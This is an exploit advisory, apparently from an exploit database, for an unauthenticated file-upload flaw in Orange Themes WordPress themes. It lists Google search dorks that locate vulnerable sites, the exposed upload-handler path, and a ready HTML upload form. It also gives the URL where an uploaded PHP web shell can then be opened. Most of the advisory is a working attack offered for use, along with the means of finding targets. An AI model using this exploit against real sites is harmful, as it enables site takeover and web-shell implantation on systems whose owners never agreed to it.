#Title : Wordpress Orange Themes CSRF File Upload Vulnerability #Author : Jje Incovers #Date : 01/12/2013 - 17 November 2013 #Category : Web Applications #Type : PHP #Vendor : http://www.orange-themes.com/ #Download : http://www.orange-themes.com/portfolio/ #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : CSRF #Scanning Theme : [ Agritourismo , Forca , Grandis , Legatus , Reganto , Sportimo , Piccione , Bulteno , Coloris , Botanica , Project 10 , Pinword , Rockstar , Kernel , Bordeaux , Radial , Oxygen , Ray Of Light , Gadgetine ] -theme #Dork : inurl:"/wp-content/themes/agritourismo-theme/" inurl:"/wp-content/themes/bordeaux-theme/" inurl:"/wp-content/themes/bulteno-theme/" inurl:"/wp-content/themes/oxygen-theme/" inurl:"/wp-content/themes/radial-theme/" inurl:"/wp-content/themes/rayoflight-theme/" inurl:"/wp-content/themes/reganto-theme/" inurl:"/wp-content/themes/rockstar-theme/" CSRF File Upload Vulnerability Exploit & POC : http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> File Access : http://site-target/wp-content/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php Note : Script CSRF equate with dork you use ######################################## #Greetz : 0day-id.com | newbie-security.or.id | SANJUNGAN JIWA #Thanks : Akira | Xie Log | - SANJUNGAN JIWA ########################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论